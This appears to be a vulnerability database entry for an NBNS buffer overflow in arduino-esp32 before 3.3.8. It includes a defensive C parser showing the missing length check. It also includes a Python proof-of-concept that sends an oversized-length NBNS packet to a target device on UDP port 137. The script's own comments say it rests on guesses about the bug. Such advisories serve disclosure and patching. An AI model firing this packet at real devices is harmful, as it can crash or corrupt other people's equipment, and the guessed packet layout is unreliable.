Security Vulnerability Report
CVE-2026-41429 CVSS 8.8 HIGH

Published: 2026-04-24 20:16:28
Last Modified: 2026-05-05 18:12:04

Description

arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. Prior to 3.3.8, there is a remotely reachable memory corruption issue in the NBNS packet handling path. When NetBIOS is enabled by calling NBNS.begin(...), the device listens on UDP port 137 and processes untrusted NBNS requests from the local network. The request parser trusts the attacker-controlled name_len field without enforcing a bound consistent with the fixed-size destination buffers used later in the flow. This vulnerability is fixed in 3.3.8.
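As an added defender-side illustration (not code from the arduino-esp32 project, whose actual parser is not reproduced on this page), the following decoder shows the check the description says was missing: the attacker-controlled name_len byte is validated against the 32-byte first-level encoding and against the bytes actually present in the datagram before anything is written into the fixed 16-byte destination. It assumes the unscoped RFC 1002 name encoding; the function names and the sample packets are constructed for this example.

```c
#include <stdint.h>
#include <string.h>

#define NBNS_HDR_LEN      12  /* ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT */
#define NBNS_ENC_NAME_LEN 32  /* first-level encoded name is always 32 bytes */
#define NBNS_NAME_LEN     16  /* decoded name: 15 characters + suffix byte */

/* Decode the question name of an unscoped NBNS request into a fixed 16-byte
 * buffer. Returns the offset of QTYPE (just past the name), or 0 if malformed.
 * name_len is attacker-controlled, so it is checked against the encoding rule
 * and against the remaining packet length before any name byte is stored. */
size_t nbns_parse_question_name(const uint8_t *pkt, size_t pkt_len,
                                uint8_t name[NBNS_NAME_LEN])
{
    size_t off = NBNS_HDR_LEN;
    if (pkt_len < off + 1) return 0;             /* no room for the length byte */
    uint8_t name_len = pkt[off++];
    if (name_len != NBNS_ENC_NAME_LEN) return 0; /* the bound: exactly 32, never more */
    if (pkt_len < off + NBNS_ENC_NAME_LEN + 1) return 0; /* 32 bytes + 0x00 terminator */
    for (size_t i = 0; i < NBNS_NAME_LEN; i++) {
        uint8_t hi = pkt[off + 2 * i], lo = pkt[off + 2 * i + 1];
        if (hi < 'A' || hi > 'P' || lo < 'A' || lo > 'P') return 0; /* half-bytes are 'A'..'P' */
        name[i] = (uint8_t)(((hi - 'A') << 4) | (lo - 'A'));
    }
    off += NBNS_ENC_NAME_LEN;
    if (pkt[off++] != 0x00) return 0;            /* scoped names are not accepted here */
    return off;
}

/* Decode and compare with an expected 16-byte name: 1 = match, 0 = rejected or different. */
int nbns_name_matches(const uint8_t *pkt, size_t pkt_len, const char *expected16)
{
    uint8_t name[NBNS_NAME_LEN];
    if (nbns_parse_question_name(pkt, pkt_len, name) == 0) return 0;
    return memcmp(name, expected16, NBNS_NAME_LEN) == 0;
}

/* Constructed sample packets, not captured traffic. GOOD_PKT queries the name
 * "MYDEVICE" (space-padded, suffix 0x00) with QTYPE NB and QCLASS IN;
 * OVERSIZED_PKT carries name_len = 0xFF with far fewer bytes behind it. */
static const uint8_t GOOD_PKT[] = {
    0x12, 0x34, 0x01, 0x10, 0x00, 0x01, 0, 0, 0, 0, 0, 0, 0x20,
    'E','N','F','J','E','E','E','F','F','G','E','J','E','D','E','F',
    'C','A','C','A','C','A','C','A','C','A','C','A','C','A','A','A',
    0x00, 0x00, 0x20, 0x00, 0x01 };
static const uint8_t OVERSIZED_PKT[] = {
    0x12, 0x34, 0x01, 0x10, 0x00, 0x01, 0, 0, 0, 0, 0, 0, 0xFF,
    'A','A','A','A','A','A','A','A','A','A','A','A','A','A','A','A' };
```

Both the oversized length byte and a datagram truncated below the 46 bytes a complete name needs are rejected before the loop runs, which is the property a parser on a fixed-size buffer has to guarantee.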

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (adjacent network, low complexity, no privileges or user interaction required; high confidentiality, integrity and availability impact)
Weakness: CWE-121 (Stack-based Buffer Overflow)

Configurations (Affected Products)

cpe:2.3:a:espressif:arduino-esp32:*:*:*:*:*:*:*:* - VULNERABLE (versions before 3.3.8)
cpe:2.3:h:espressif:esp32:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:espressif:esp32-c3:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:espressif:esp32-c6:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:espressif:esp32-h2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:espressif:esp32-s2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:espressif:esp32-s3:-:*:*:*:*:*:*:* - NOT VULNERABLE
Affected version range: arduino-esp32 < 3.3.8

The hardware entries are the platforms the affected core runs on (the NVD "running on/with" part of the configuration), not a statement that the chips themselves are unaffected; a device is exposed when it runs an arduino-esp32 build before 3.3.8 with NBNS.begin(...) called.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import struct

# Proof of Concept for CVE-2026-41429
# Target: arduino-esp32 device with NBNS enabled on UDP port 137
target_ip = "192.168.1.100"  # Replace with target IP
target_port = 137

# Construct a malicious NBNS packet
# NBNS header (Transaction ID, Flags, Questions, Answer RRs, Authority RRs, Additional RRs)
# We focus on the Question part where the Name Length is manipulated.
# Standard NBNS Name encoding: Length byte followed by labels.
# Malicious packet structure:
# Header (12 bytes) + Question Name (variable, manipulated length) + Type (2) + Class (2)
transaction_id = 0x1234
flags = 0x0110  # Standard query
questions = 1
answer_rrs = 0
authority_rrs = 0
additional_rrs = 0
header = struct.pack("!HHHHHH", transaction_id, flags, questions,
                     answer_rrs, authority_rrs, additional_rrs)

# Malformed Name: Excessive length byte (e.g., 0xFF) to trigger buffer overflow
# The vulnerability lies in trusting this length byte without bounds checking.
# Real NBNS names are encoded differently, but the core issue is the length field.
# Here we simulate a packet with a large length field to trigger the corruption.
# Creating a payload with a length byte that exceeds the buffer size
# Assuming the bug is triggered by a large length in the label field.
encoded_name = b'\xFF' + b'A' * 63  # Length byte 255 followed by padding
type_qtype = 0x0020  # NB (NetBIOS General Name Service)
qclass = 0x0001  # IN (Internet)
payload = header + encoded_name + struct.pack("!HH", type_qtype, qclass)

print(f"Sending malicious packet to {target_ip}:{target_port}...")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (target_ip, target_port))
sock.close()
print("Packet sent.")
```

References

https://github.com/espressif/arduino-esp32/security/advisories/GHSA-92j9-c75g-2c5f (Vendor Advisory)